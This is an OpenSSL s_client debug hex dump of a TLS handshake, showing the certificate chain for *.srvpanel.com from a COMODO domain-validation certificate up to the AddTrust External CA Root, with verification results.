0000 - 00 3e 03 03 59 36 d1 3c-70 65 8c 7b be 20 d4 dc   .>..Y6.<pe.{. ..
0010 - 95 25 f9 93 bf 44 1c 5f-19 4e f4 7d 38 7d bd 47   .%...D._.N.}8}.G
0020 - bf 35 b0 19 00 c0 30 00-00 16 ff 01 00 01 00 00   .5....0.........
0030 - 0b 00 04 03 00 01 02 00-23 00 00 00 0f 00 01 01   ........#.......
read from 0xee8a60 [0xf2cc53] (5 bytes => 5 (0x5))
0000 - 16 03 03 10 e9                                    .....
read from 0xee8a60 [0xf2cc58] (4329 bytes => 1336 (0x538))
0000 - 0b 00 10 e5 00 10 e2 00-05 55 30 82 05 51 30 82   .........U0..Q0.
0010 - 04 39 a0 03 02 01 02 02-10 14 ff 46 d6 54 b0 26   .9.........F.T.&
0020 - 62 8e 8f be 09 c4 ab 2b-16 30 0d 06 09 2a 86 48   b......+.0...*.H
0030 - 86 f7 0d 01 01 0b 05 00-30 81 90 31 0b 30 09 06   ........0..1.0..
0040 - 03 55 04 06 13 02 47 42-31 1b 30 19 06 03 55 04   .U....GB1.0...U.
0050 - 08 13 12 47 72 65 61 74-65 72 20 4d 61 6e 63 68   ...Greater Manch
0060 - 65 73 74 65 72 31 10 30-0e 06 03 55 04 07 13 07   ester1.0...U....
0070 - 53 61 6c 66 6f 72 64 31-1a 30 18 06 03 55 04 0a   Salford1.0...U..
0080 - 13 11 43 4f 4d 4f 44 4f-20 43 41 20 4c 69 6d 69   ..COMODO CA Limi
0090 - 74 65 64 31 36 30 34 06-03 55 04 03 13 2d 43 4f   ted1604..U...-CO
00a0 - 4d 4f 44 4f 20 52 53 41-20 44 6f 6d 61 69 6e 20   MODO RSA Domain
00b0 - 56 61 6c 69 64 61 74 69-6f 6e 20 53 65 63 75 72   Validation Secur
00c0 - 65 20 53 65 72 76 65 72-20 43 41 30 1e 17 0d 31   e Server CA0...1
00d0 - 36 31 31 32 35 30 30 30-30 30 30 5a 17 0d 31 39   61125000000Z..19
00e0 - 31 32 30 38 32 33 35 39-35 39 5a 30 5b 31 21 30   1208235959Z0[1!0
00f0 - 1f 06 03 55 04 0b 13 18-44 6f 6d 61 69 6e 20 43   ...U....Domain C
0100 - 6f 6e 74 72 6f 6c 20 56-61 6c 69 64 61 74 65 64   ontrol Validated
0110 - 31 1d 30 1b 06 03 55 04-0b 13 14 50 6f 73 69 74   1.0...U....Posit
0120 - 69 76 65 53 53 4c 20 57-69 6c 64 63 61 72 64 31   iveSSL Wildcard1
0130 - 17 30 15 06 03 55 04 03-0c 0e 2a 2e 73 72 76 70   .0...U....*.srvp
0140 - 61 6e 65 6c 2e 63 6f 6d-30 82 01 22 30 0d 06 09   anel.com0.."0...
0150 - 2a 86 48 86 f7 0d 01 01-01 05 00 03 82 01 0f 00   *.H.............
0160 - 30 82 01 0a 02 82 01 01-00 c3 71 d4 28 f1 66 3c   0.........q.(.f<
0170 - 5e 67 5e a0 cf da dc 57-91 53 d7 c8 32 6a 22 e8   ^g^....W.S..2j".
0180 - fc 82 df f3 09 ce 65 31-ed 50 c9 18 eb d0 58 c7   ......e1.P....X.
0190 - 94 ca 53 b9 87 e4 c8 4d-d4 a0 9b 40 c3 f0 05 38   ..S....M...@...8
01a0 - b9 1b 33 e8 15 17 34 4c-08 61 b4 84 5b 4e 38 86   ..3...4L.a..[N8.
01b0 - f5 df 9a ea 63 a2 6e c1-fe 71 66 27 7b c6 e3 9a   ....c.n..qf'{...
01c0 - e9 19 d2 22 af 16 6f a9-94 cc 98 7d 06 ee 2d e2   ..."..o....}..-.
01d0 - 6c 32 7b 69 3b 6b 7f ed-24 70 c8 07 d4 08 d8 d0   l2{i;k..$p......
01e0 - 93 8f f0 75 7f 9c a6 23-f4 52 af ae 6b d9 75 3d   ...u...#.R..k.u=
01f0 - 3c 99 18 91 a0 23 4e be-6e 05 f7 b0 89 46 c4 1b   <....#N.n....F..
0200 - 0e 8d 4d c8 44 7f a2 21-51 a6 b0 6f f5 1f b2 19   ..M.D..!Q..o....
0210 - 96 ef c5 c2 9f f6 26 63-a1 d9 c8 68 35 22 f1 80   ......&c...h5"..
0220 - 96 1e 0b ec e0 4d 9c 7a-82 74 05 21 ac 3e f7 ce   .....M.z.t.!.>..
0230 - 73 ce bd d3 7d e5 b0 a6-48 17 94 0d a0 aa 58 0c   s...}...H.....X.
0240 - a0 c3 fc 4a 5e de 94 23-32 4a 49 6e 3b 53 bc 2d   ...J^..#2JIn;S.-
0250 - 2d 9a 85 b1 07 66 34 d1-e5 43 57 82 be 7b f2 ba   -....f4..CW..{..
0260 - 48 77 2c 87 15 42 40 68-e1 02 03 01 00 01 a3 82   Hw,..B@h........
0270 - 01 d9 30 82 01 d5 30 1f-06 03 55 1d 23 04 18 30   ..0...0...U.#..0
0280 - 16 80 14 90 af 6a 3a 94-5a 0b d8 90 ea 12 56 73   .....j:.Z.....Vs
0290 - df 43 b4 3a 28 da e7 30-1d 06 03 55 1d 0e 04 16   .C.:(..0...U....
02a0 - 04 14 df 54 0d 79 b3 58-c5 02 b6 4f 0d b2 af 94   ...T.y.X...O....
02b0 - 47 9d 9a a7 f7 70 30 0e-06 03 55 1d 0f 01 01 ff   G....p0...U.....
02c0 - 04 04 03 02 05 a0 30 0c-06 03 55 1d 13 01 01 ff   ......0...U.....
02d0 - 04 02 30 00 30 1d 06 03-55 1d 25 04 16 30 14 06   ..0.0...U.%..0..
02e0 - 08 2b 06 01 05 05 07 03-01 06 08 2b 06 01 05 05   .+.........+....
02f0 - 07 03 02 30 4f 06 03 55-1d 20 04 48 30 46 30 3a   ...0O..U. .H0F0:
0300 - 06 0b 2b 06 01 04 01 b2-31 01 02 02 07 30 2b 30   ..+.....1....0+0
0310 - 29 06 08 2b 06 01 05 05-07 02 01 16 1d 68 74 74   )..+.........htt
0320 - 70 73 3a 2f 2f 73 65 63-75 72 65 2e 63 6f 6d 6f   ps://secure.como
0330 - 64 6f 2e 63 6f 6d 2f 43-50 53 30 08 06 06 67 81   do.com/CPS0...g.
0340 - 0c 01 02 01 30 54 06 03-55 1d 1f 04 4d 30 4b 30   ....0T..U...M0K0
0350 - 49 a0 47 a0 45 86 43 68-74 74 70 3a 2f 2f 63 72   I.G.E.Chttp://cr
0360 - 6c 2e 63 6f 6d 6f 64 6f-63 61 2e 63 6f 6d 2f 43   l.comodoca.com/C
0370 - 4f 4d 4f 44 4f 52 53 41-44 6f 6d 61 69 6e 56 61   OMODORSADomainVa
0380 - 6c 69 64 61 74 69 6f 6e-53 65 63 75 72 65 53 65   lidationSecureSe
0390 - 72 76 65 72 43 41 2e 63-72 6c 30 81 85 06 08 2b   rverCA.crl0....+
03a0 - 06 01 05 05 07 01 01 04-79 30 77 30 4f 06 08 2b   ........y0w0O..+
03b0 - 06 01 05 05 07 30 02 86-43 68 74 74 70 3a 2f 2f   .....0..Chttp://
03c0 - 63 72 74 2e 63 6f 6d 6f-64 6f 63 61 2e 63 6f 6d   crt.comodoca.com
03d0 - 2f 43 4f 4d 4f 44 4f 52-53 41 44 6f 6d 61 69 6e   /COMODORSADomain
03e0 - 56 61 6c 69 64 61 74 69-6f 6e 53 65 63 75 72 65   ValidationSecure
03f0 - 53 65 72 76 65 72 43 41-2e 63 72 74 30 24 06 08   ServerCA.crt0$..
0400 - 2b 06 01 05 05 07 30 01-86 18 68 74 74 70 3a 2f   +.....0...http:/
0410 - 2f 6f 63 73 70 2e 63 6f-6d 6f 64 6f 63 61 2e 63   /ocsp.comodoca.c
0420 - 6f 6d 30 27 06 03 55 1d-11 04 20 30 1e 82 0e 2a   om0'..U... 0...*
0430 - 2e 73 72 76 70 61 6e 65-6c 2e 63 6f 6d 82 0c 73   .srvpanel.com..s
0440 - 72 76 70 61 6e 65 6c 2e-63 6f 6d 30 0d 06 09 2a   rvpanel.com0...*
0450 - 86 48 86 f7 0d 01 01 0b-05 00 03 82 01 01 00 46   .H.............F
0460 - 54 78 e7 40 6b 89 63 a1-8d e5 cb 27 08 8f 2a 9d   Tx.@k.c....'..*.
0470 - 0d b4 c0 03 75 cb 0c 65-47 00 04 6a a9 42 aa e6   ....u..eG..j.B..
0480 - 22 13 fb c4 96 7d 0f 54-41 c1 20 ba ac a5 e7 b1   "....}.TA. .....
0490 - c4 b7 a7 02 4a 77 df 6a-de f7 e4 af 00 68 be 32   ....Jw.j.....h.2
04a0 - 72 c8 28 57 f6 8a f5 c4-bd af a8 68 26 06 c4 5b   r.(W.......h&..[
04b0 - 5e 26 18 42 5d c6 37 7c-b1 8a 87 73 17 1a 51 47   ^&.B].7|...s..QG
04c0 - 99 2f 7a ff 1e 07 f6 a4-ff 24 e6 bc 2d bd 61 b1   ./z......$..-.a.
04d0 - cd 77 01 73 2e 94 f0 21-b7 95 d4 83 6a ab ec ea   .w.s...!....j...
04e0 - 4e 3f 70 47 2b de 9a 2a-fd be 3e c8 bb 9b 19 b5   N?pG+..*..>.....
04f0 - 02 8d 5f 2c bb db 48 b9-d9 9a c1 22 64 ed 56 9a   .._,..H...."d.V.
0500 - b2 2a 2e 84 37 9e 2e bf-ed 76 cb 28 12 c3 7a ec   .*..7....v.(..z.
0510 - a2 ef 8f a0 53 a6 ec ad-52 1a 89 bb 22 a8 d9 b6   ....S...R..."...
0520 - f3 c5 49 05 2f 88 f2 e6-eb 56 ce a2 08 ce a1 9a   ..I./....V......
0530 - 3a 6b 41 07 d1 84 e4 58-                          :kA....X
read from 0xee8a60 [0xf2d190] (2993 bytes => 2684 (0xA7C))
0000 - 48 c5 d2 37 65 44 9e 35-b7 ee 90 1f 69 43 72 5b   H..7eD.5....iCr[
0010 - df 28 7f 88 34 5a e0 67-51 d9 7e 8d 67 ff 66 71   .(..4Z.gQ.~.g.fq
0020 - 61 11 cc f9 8d 46 e6 00-06 0c 30 82 06 08 30 82   a....F....0...0.
0030 - 03 f0 a0 03 02 01 02 02-10 2b 2e 6e ea d9 75 36   .........+.n..u6
0040 - 6c 14 8a 6e db a3 7c 8c-07 30 0d 06 09 2a 86 48   l..n..|..0...*.H
0050 - 86 f7 0d 01 01 0c 05 00-30 81 85 31 0b 30 09 06   ........0..1.0..
0060 - 03 55 04 06 13 02 47 42-31 1b 30 19 06 03 55 04   .U....GB1.0...U.
0070 - 08 13 12 47 72 65 61 74-65 72 20 4d 61 6e 63 68   ...Greater Manch
0080 - 65 73 74 65 72 31 10 30-0e 06 03 55 04 07 13 07   ester1.0...U....
0090 - 53 61 6c 66 6f 72 64 31-1a 30 18 06 03 55 04 0a   Salford1.0...U..
00a0 - 13 11 43 4f 4d 4f 44 4f-20 43 41 20 4c 69 6d 69   ..COMODO CA Limi
00b0 - 74 65 64 31 2b 30 29 06-03 55 04 03 13 22 43 4f   ted1+0)..U..."CO
00c0 - 4d 4f 44 4f 20 52 53 41-20 43 65 72 74 69 66 69   MODO RSA Certifi
00d0 - 63 61 74 69 6f 6e 20 41-75 74 68 6f 72 69 74 79   cation Authority
00e0 - 30 1e 17 0d 31 34 30 32-31 32 30 30 30 30 30 30   0...140212000000
00f0 - 5a 17 0d 32 39 30 32 31-31 32 33 35 39 35 39 5a   Z..290211235959Z
0100 - 30 81 90 31 0b 30 09 06-03 55 04 06 13 02 47 42   0..1.0...U....GB
0110 - 31 1b 30 19 06 03 55 04-08 13 12 47 72 65 61 74   1.0...U....Great
0120 - 65 72 20 4d 61 6e 63 68-65 73 74 65 72 31 10 30   er Manchester1.0
0130 - 0e 06 03 55 04 07 13 07-53 61 6c 66 6f 72 64 31   ...U....Salford1
0140 - 1a 30 18 06 03 55 04 0a-13 11 43 4f 4d 4f 44 4f   .0...U....COMODO
0150 - 20 43 41 20 4c 69 6d 69-74 65 64 31 36 30 34 06    CA Limited1604.
0160 - 03 55 04 03 13 2d 43 4f-4d 4f 44 4f 20 52 53 41   .U...-COMODO RSA
0170 - 20 44 6f 6d 61 69 6e 20-56 61 6c 69 64 61 74 69    Domain Validati
0180 - 6f 6e 20 53 65 63 75 72-65 20 53 65 72 76 65 72   on Secure Server
0190 - 20 43 41 30 82 01 22 30-0d 06 09 2a 86 48 86 f7    CA0.."0...*.H..
01a0 - 0d 01 01 01 05 00 03 82-01 0f 00 30 82 01 0a 02   ...........0....
01b0 - 82 01 01 00 8e c2 02 19-e1 a0 59 a4 eb 38 35 8d   ..........Y..85.
01c0 - 2c fd 01 d0 d3 49 c0 64-c7 0b 62 05 45 16 3a a8   ,....I.d..b.E.:.
01d0 - a0 c0 0c 02 7f 1d cc db-c4 a1 6d 77 03 a3 0f 86   ..........mw....
01e0 - f9 e3 06 9c 3e 0b 81 8a-9b 49 1b ad 03 be fa 4b   ....>....I.....K
01f0 - db 8c 20 ed d5 ce 5e 65-8e 3e 0d af 4c c2 b0 b7   .. ...^e.>..L...
0200 - 45 5e 52 2f 34 de 48 24-64 b4 41 ae 00 97 f7 be   E^R/4.H$d.A.....
0210 - 67 de 9e d0 7a a7 53 80-3b 7c ad f5 96 55 6f 97   g...z.S.;|...Uo.
0220 - 47 0a 7c 85 8b 22 97 8d-b3 84 e0 96 57 d0 70 18   G.|.."......W.p.
0230 - 60 96 8f ee 2d 07 93 9d-a1 ba ca d1 cd 7b e9 c4   `...-........{..
0240 - 2a 9a 28 21 91 4d 6f 92-4f 25 a5 f2 7a 35 dd 26   *.(!.Mo.O%..z5.&
0250 - dc 46 a5 d0 ac 59 35 8c-ff 4e 91 43 50 3f 59 93   .F...Y5..N.CP?Y.
0260 - 1e 6c 51 21 ee 58 14 ab-fe 75 50 78 3e 4c b0 1c   .lQ!.X...uPx>L..
0270 - 86 13 fa 6b 98 bc e0 3b-94 1e 85 52 dc 03 93 24   ...k...;...R...$
0280 - 18 6e cb 27 51 45 e6 70-de 25 43 a4 0d e1 4a a5   .n.'QE.p.%C...J.
0290 - ed b6 7e c8 cd 6d ee 2e-1d 27 73 5d dc 45 30 80   ..~..m...'s].E0.
02a0 - aa e3 b2 41 0b af bd 44-87 da b9 e5 1b 9d 7f ae   ...A...D........
02b0 - e5 85 82 a5 02 03 01 00-01 a3 82 01 65 30 82 01   ............e0..
02c0 - 61 30 1f 06 03 55 1d 23-04 18 30 16 80 14 bb af   a0...U.#..0.....
02d0 - 7e 02 3d fa a6 f1 3c 84-8e ad ee 38 98 ec d9 32   ~.=...<....8...2
02e0 - 32 d4 30 1d 06 03 55 1d-0e 04 16 04 14 90 af 6a   2.0...U........j
02f0 - 3a 94 5a 0b d8 90 ea 12-56 73 df 43 b4 3a 28 da   :.Z.....Vs.C.:(.
0300 - e7 30 0e 06 03 55 1d 0f-01 01 ff 04 04 03 02 01   .0...U..........
0310 - 86 30 12 06 03 55 1d 13-01 01 ff 04 08 30 06 01   .0...U.......0..
0320 - 01 ff 02 01 00 30 1d 06-03 55 1d 25 04 16 30 14   .....0...U.%..0.
0330 - 06 08 2b 06 01 05 05 07-03 01 06 08 2b 06 01 05   ..+.........+...
0340 - 05 07 03 02 30 1b 06 03-55 1d 20 04 14 30 12 30   ....0...U. ..0.0
0350 - 06 06 04 55 1d 20 00 30-08 06 06 67 81 0c 01 02   ...U. .0...g....
0360 - 01 30 4c 06 03 55 1d 1f-04 45 30 43 30 41 a0 3f   .0L..U...E0C0A.?
0370 - a0 3d 86 3b 68 74 74 70-3a 2f 2f 63 72 6c 2e 63   .=.;http://crl.c
0380 - 6f 6d 6f 64 6f 63 61 2e-63 6f 6d 2f 43 4f 4d 4f   omodoca.com/COMO
0390 - 44 4f 52 53 41 43 65 72-74 69 66 69 63 61 74 69   DORSACertificati
03a0 - 6f 6e 41 75 74 68 6f 72-69 74 79 2e 63 72 6c 30   onAuthority.crl0
03b0 - 71 06 08 2b 06 01 05 05-07 01 01 04 65 30 63 30   q..+........e0c0
03c0 - 3b 06 08 2b 06 01 05 05-07 30 02 86 2f 68 74 74   ;..+.....0../htt
03d0 - 70 3a 2f 2f 63 72 74 2e-63 6f 6d 6f 64 6f 63 61   p://crt.comodoca
03e0 - 2e 63 6f 6d 2f 43 4f 4d-4f 44 4f 52 53 41 41 64   .com/COMODORSAAd
03f0 - 64 54 72 75 73 74 43 41-2e 63 72 74 30 24 06 08   dTrustCA.crt0$..
0400 - 2b 06 01 05 05 07 30 01-86 18 68 74 74 70 3a 2f   +.....0...http:/
0410 - 2f 6f 63 73 70 2e 63 6f-6d 6f 64 6f 63 61 2e 63   /ocsp.comodoca.c
0420 - 6f 6d 30 0d 06 09 2a 86-48 86 f7 0d 01 01 0c 05   om0...*.H.......
0430 - 00 03 82 02 01 00 4e 2b-76 4f 92 1c 62 36 89 ba   ......N+vO..b6..
0440 - 77 c1 27 05 f4 1c d6 44-9d a9 9a 3e aa d5 66 66   w.'....D...>..ff
0450 - 01 3e ea 49 e6 a2 35 bc-fa f6 dd 95 8e 99 35 98   .>.I..5.......5.
0460 - 0e 36 18 75 b1 dd dd 50-72 7c ae dc 77 88 ce 0f   .6.u...Pr|..w...
0470 - f7 90 20 ca a3 67 2e 1f-56 7f 7b e1 44 ea 42 95   .. ..g..V.{.D.B.
0480 - c4 5d 0d 01 50 46 15 f2-81 89 59 6c 8a dd 8c f1   .]..PF....Yl....
0490 - 12 a1 8d 3a 42 8a 98 f8-4b 34 7b 27 3b 08 b4 6f   ...:B...K4{';..o
04a0 - 24 3b 72 9d 63 74 58 3c-1a 6c 3f 4f c7 11 9a c8   $;r.ctX<.l?O....
04b0 - a8 f5 b5 37 ef 10 45 c6-6c d9 e0 5e 95 26 b3 eb   ...7..E.l..^.&..
04c0 - ad a3 b9 ee 7f 0c 9a 66-35 73 32 60 4e e5 dd 8a   .......f5s2`N...
04d0 - 61 2c 6e 52 11 77 68 96-d3 18 75 51 15 00 1b 74   a,nR.wh...uQ...t
04e0 - 88 dd e1 c7 38 04 43 28-e9 16 fd d9 05 d4 5d 47   ....8.C(......]G
04f0 - 27 60 d6 fb 38 3b 6c 72-a2 94 f8 42 1a df ed 6f   '`..8;lr...B...o
0500 - 06 8c 45 c2 06 00 aa e4-e8 dc d9 b5 e1 73 78 ec   ..E..........sx.
0510 - f6 23 dc d1 dd 6c 8e 1a-8f a5 ea 54 7c 96 b7 c3   .#...l.....T|...
0520 - fe 55 8e 8d 49 5e fc 64-bb cf 3e bd 96 eb 69 cd   .U..I^.d..>...i.
0530 - bf e0 48 f1 62 82 10 e5-0c 46 57 f2 33 da d0 c8   ..H.b....FW.3...
0540 - 63 ed c6 1f 94 05 96 4a-1a 91 d1 f7 eb cf 8f 52   c......J.......R
0550 - ae 0d 08 d9 3e a8 a0 51-e9 c1 87 74 d5 c9 f7 74   ....>..Q...t...t
0560 - ab 2e 53 fb bb 7a fb 97-e2 f8 1f 26 8f b3 d2 a0   ..S..z.....&....
0570 - e0 37 5b 28 3b 31 e5 0e-57 2d 5a b8 ad 79 ac 5e   .7[(;1..W-Z..y.^
0580 - 20 66 1a a5 b9 a6 b5 39-c1 f5 98 43 ff ee f9 a7    f.....9...C....
0590 - a7 fd ee ca 24 3d 80 16-c4 17 8f 8a c1 60 a1 0c   ....$=.......`..
05a0 - ae 5b 43 47 91 4b d5 9a-17 5f f9 d4 87 c1 c2 8c   .[CG.K..._......
05b0 - b7 e7 e2 0f 30 19 37 86-ac e0 dc 42 03 e6 94 a8   ....0.7....B....
05c0 - 9d ae fd 0f 24 51 94 ce-92 08 d1 fc 50 f0 03 40   ....$Q......P..@
05d0 - 7b 88 59 ed 0e dd ac d2-77 82 34 dc 06 95 02 d8   {.Y.....w.4.....
05e0 - 90 f9 2d ea 37 d5 1a 60-d0 67 20 d7 d8 42 0b 45   ..-.7..`.g ..B.E
05f0 - af 82 68 de dd 66 24 37-90 29 94 19 46 19 25 b8   ..h..f$7.)..F.%.
0600 - 80 d7 cb d4 86 28 6a 44-70 26 23 62 a9 9f 86 6f   .....(jDp&#b...o
0610 - bf ba 90 70 d2 56 77 85-78 ef ea 25 a9 17 ce 50   ...p.Vw.x..%...P
0620 - 72 8c 00 3a aa e3 db 63-34 9f f8 06 71 01 e2 82   r..:...c4...q...
0630 - 20 d4 fe 6f bd b1 00 05-78 30 82 05 74 30 82 04    ..o....x0..t0..
0640 - 5c a0 03 02 01 02 02 10-27 66 ee 56 eb 49 f3 8e   \.......'f.V.I..
0650 - ab d7 70 a2 fc 84 de 22-30 0d 06 09 2a 86 48 86   ..p...."0...*.H.
0660 - f7 0d 01 01 0c 05 00 30-6f 31 0b 30 09 06 03 55   .......0o1.0...U
0670 - 04 06 13 02 53 45 31 14-30 12 06 03 55 04 0a 13   ....SE1.0...U...
0680 - 0b 41 64 64 54 72 75 73-74 20 41 42 31 26 30 24   .AddTrust AB1&0$
0690 - 06 03 55 04 0b 13 1d 41-64 64 54 72 75 73 74 20   ..U....AddTrust
06a0 - 45 78 74 65 72 6e 61 6c-20 54 54 50 20 4e 65 74   External TTP Net
06b0 - 77 6f 72 6b 31 22 30 20-06 03 55 04 03 13 19 41   work1"0 ..U....A
06c0 - 64 64 54 72 75 73 74 20-45 78 74 65 72 6e 61 6c   ddTrust External
06d0 - 20 43 41 20 52 6f 6f 74-30 1e 17 0d 30 30 30 35    CA Root0...0005
06e0 - 33 30 31 30 34 38 33 38-5a 17 0d 32 30 30 35 33   30104838Z..20053
06f0 - 30 31 30 34 38 33 38 5a-30 81 85 31 0b 30 09 06   0104838Z0..1.0..
0700 - 03 55 04 06 13 02 47 42-31 1b 30 19 06 03 55 04   .U....GB1.0...U.
0710 - 08 13 12 47 72 65 61 74-65 72 20 4d 61 6e 63 68   ...Greater Manch
0720 - 65 73 74 65 72 31 10 30-0e 06 03 55 04 07 13 07   ester1.0...U....
0730 - 53 61 6c 66 6f 72 64 31-1a 30 18 06 03 55 04 0a   Salford1.0...U..
0740 - 13 11 43 4f 4d 4f 44 4f-20 43 41 20 4c 69 6d 69   ..COMODO CA Limi
0750 - 74 65 64 31 2b 30 29 06-03 55 04 03 13 22 43 4f   ted1+0)..U..."CO
0760 - 4d 4f 44 4f 20 52 53 41-20 43 65 72 74 69 66 69   MODO RSA Certifi
0770 - 63 61 74 69 6f 6e 20 41-75 74 68 6f 72 69 74 79   cation Authority
0780 - 30 82 02 22 30 0d 06 09-2a 86 48 86 f7 0d 01 01   0.."0...*.H.....
0790 - 01 05 00 03 82 02 0f 00-30 82 02 0a 02 82 02 01   ........0.......
07a0 - 00 91 e8 54 92 d2 0a 56-b1 ac 0d 24 dd c5 cf 44   ...T...V...$...D
07b0 - 67 74 99 2b 37 a3 7d 23-70 00 71 bc 53 df c4 fa   gt.+7.}#p.q.S...
07c0 - 2a 12 8f 4b 7f 10 56 bd-9f 70 72 b7 61 7f c9 4b   *..K..V..pr.a..K
07d0 - 0f 17 a7 3d e3 b0 04 61-ee ff 11 97 c7 f4 86 3e   ...=...a.......>
07e0 - 0a fa 3e 5c f9 93 e6 34-7a d9 14 6b e7 9c b3 85   ..>\...4z..k....
07f0 - a0 82 7a 76 af 71 90 d7-ec fd 0d fa 9c 6c fa df   ..zv.q.......l..
0800 - b0 82 f4 14 7e f9 be c4-a6 2f 4f 7f 99 7f b5 fc   ....~..../O.....
0810 - 67 43 72 bd 0c 00 d6 89-eb 6b 2c d3 ed 8f 98 1c   gCr......k,.....
0820 - 14 ab 7e e5 e3 6e fc d8-a8 e4 92 24 da 43 6b 62   ..~..n.....$.Ckb
0830 - b8 55 fd ea c1 bc 6c b6-8b f3 0e 8d 9a e4 9b 6c   .U....l........l
0840 - 69 99 f8 78 48 30 45 d5-ad e1 0d 3c 45 60 fc 32   i..xH0E....<E`.2
0850 - 96 51 27 bc 67 c3 ca 2e-b6 6b ea 46 c7 c7 20 a0   .Q'.g....k.F.. .
0860 - b1 1f 65 de 48 08 ba a4-4e a9 f2 83 46 37 84 eb   ..e.H...N...F7..
0870 - e8 cc 81 48 43 67 4e 72-2a 9b 5c bd 4c 1b 28 8a   ...HCgNr*.\.L.(.
0880 - 5c 22 7b b4 ab 98 d9 ee-e0 51 83 c3 09 46 4e 6d   \"{......Q...FNm
0890 - 3e 99 fa 95 17 da 7c 33-57 41 3c 8d 51 ed 0b b6   >.....|3WA<.Q...
08a0 - 5c af 2c 63 1a df 57 c8-3f bc e9 5d c4 9b af 45   \.,c..W.?..]...E
08b0 - 99 e2 a3 5a 24 b4 ba a9-56 3d cf 6f aa ff 49 58   ...Z$...V=.o..IX
08c0 - be f0 a8 ff f4 b8 ad e9-37 fb ba b8 f4 0b 3a f9   ........7.....:.
08d0 - e8 43 42 1e 89 d8 84 cb-13 f1 d9 bb e1 89 60 b8   .CB...........`.
08e0 - 8c 28 56 ac 14 1d 9c 0a-e7 71 eb cf 0e dd 3d a9   .(V......q....=.
08f0 - 96 a1 48 bd 3c f7 af b5-0d 22 4c c0 11 81 ec 56   ..H.<...."L....V
0900 - 3b f6 d3 a2 e2 5b b7 b2-04 22 52 95 80 93 69 e8   ;....[..."R...i.
0910 - 8e 4c 65 f1 91 03 2d 70-74 02 ea 8b 67 15 29 69   .Le...-pt...g.)i
0920 - 52 02 bb d7 df 50 6a 55-46 bf a0 a3 28 61 7f 70   R....PjUF...(a.p
0930 - d0 c3 a2 aa 2c 21 aa 47-ce 28 9c 06 45 76 bf 82   ....,!.G.(..Ev..
0940 - 18 27 b4 d5 ae b4 cb 50-e6 6b f4 4c 86 71 30 e9   .'.....P.k.L.q0.
0950 - a6 df 16 86 e0 d8 ff 40-dd fb d0 42 88 7f a3 33   .......@...B...3
0960 - 3a 2e 5c 1e 41 11 81 63-ce 18 71 6b 2b ec a6 8a   :.\.A..c..qk+...
0970 - b7 31 5c 3a 6a 47 e0 c3-79 59 d6 20 1a af f2 6a   .1\:jG..yY. ...j
0980 - 98 aa 72 bc 57 4a d2 4b-9d bb 10 fc b0 4c 41 e5   ..r.WJ.K.....LA.
0990 - ed 1d 3d 5e 28 9d 9c cc-bf b3 51 da a7 47 e5 84   ..=^(.....Q..G..
09a0 - 53 02 03 01 00 01 a3 81-f4 30 81 f1 30 1f 06 03   S........0..0...
09b0 - 55 1d 23 04 18 30 16 80-14 ad bd 98 7a 34 b4 26   U.#..0......z4.&
09c0 - f7 fa c4 26 54 ef 03 bd-e0 24 cb 54 1a 30 1d 06   ...&T....$.T.0..
09d0 - 03 55 1d 0e 04 16 04 14-bb af 7e 02 3d fa a6 f1   .U........~.=...
09e0 - 3c 84 8e ad ee 38 98 ec-d9 32 32 d4 30 0e 06 03   <....8...22.0...
09f0 - 55 1d 0f 01 01 ff 04 04-03 02 01 86 30 0f 06 03   U...........0...
0a00 - 55 1d 13 01 01 ff 04 05-30 03 01 01 ff 30 11 06   U.......0....0..
0a10 - 03 55 1d 20 04 0a 30 08-30 06 06 04 55 1d 20 00   .U. ..0.0...U. .
0a20 - 30 44 06 03 55 1d 1f 04-3d 30 3b 30 39 a0 37 a0   0D..U...=0;09.7.
0a30 - 35 86 33 68 74 74 70 3a-2f 2f 63 72 6c 2e 75 73   5.3http://crl.us
0a40 - 65 72 74 72 75 73 74 2e-63 6f 6d 2f 41 64 64 54   ertrust.com/AddT
0a50 - 72 75 73 74 45 78 74 65-72 6e 61 6c 43 41 52 6f   rustExternalCARo
0a60 - 6f 74 2e 63 72 6c 30 35-06 08 2b 06 01 05 05 07   ot.crl05..+.....
0a70 - 01 01 04 29 30 27 30 25-06 08 2b 06               ...)0'0%..+.
read from 0xee8a60 [0xf2dc0c] (309 bytes => 309 (0x135))
0000 - 01 05 05 07 30 01 86 19-68 74 74 70 3a 2f 2f 6f   ....0...http://o
0010 - 63 73 70 2e 75 73 65 72-74 72 75 73 74 2e 63 6f   csp.usertrust.co
0020 - 6d 30 0d 06 09 2a 86 48-86 f7 0d 01 01 0c 05 00   m0...*.H........
0030 - 03 82 01 01 00 64 bf 83-f1 5f 9a 85 d0 cd b8 a1   .....d..._......
0040 - 29 57 0d e8 5a f7 d1 e9-3e f2 76 04 6e f1 52 70   )W..Z...>.v.n.Rp
0050 - bb 1e 3c ff 4d 0d 74 6a-cc 81 82 25 d3 c3 a0 2a   ..<.M.tj...%...*
0060 - 5d 4c f5 ba 8b a1 6d c4-54 09 75 c7 e3 27 0e 5d   ]L....m.T.u..'.]
0070 - 84 79 37 40 13 77 f5 b4-ac 1c d0 3b ab 17 12 d6   .y7@.w.....;....
0080 - ef 34 18 7e 2b e9 79 d3-ab 57 45 0c af 28 fa d0   .4.~+.y..WE..(..
0090 - db e5 50 95 88 bb df 85-57 69 7d 92 d8 52 ca 73   ..P.....Wi}..R.s
00a0 - 81 bf 1c f3 e6 b8 6e 66-11 05 b3 1e 94 2d 7f 91   ......nf.....-..
00b0 - 95 92 59 f1 4c ce a3 91-71 4c 7c 47 0c 3b 0b 19   ..Y.L...qL|G.;..
00c0 - f6 a1 b1 6c 86 3e 5c aa-c4 2e 82 cb f9 07 96 ba   ...l.>\.........
00d0 - 48 4d 90 f2 94 c8 a9 73-a2 eb 06 7b 23 9d de a2   HM.....s...{#...
00e0 - f3 4d 55 9f 7a 61 45 98-18 68 c7 5e 40 6b 23 f5   .MU.zaE..h.^@k#.
00f0 - 79 7a ef 8c b5 6b 8b b7-6f 46 f4 7b f1 3d 4b 04   yz...k..oF.{.=K.
0100 - d8 93 80 59 5a e0 41 24-1d b2 8f 15 60 58 47 db   ...YZ.A$....`XG.
0110 - ef 6e 46 fd 15 f5 d9 5f-9a b3 db d8 b8 e4 40 b3   .nF...._......@.
0120 - cd 97 39 ae 85 bb 1d 8e-bc dc 87 9b d1 a6 ef f1   ..9.............
0130 - 3b 6f 10 38 6f                                    ;o.8o
depth=3 C = SE, O = AddTrust AB, OU = AddTrust External TTP Network, CN = AddTrust External CA Root
verify return:1
depth=2 C = GB, ST = Greater Manchester, L = Salford, O = COMODO CA Limited, CN = COMODO RSA Certification Authority
verify return:1
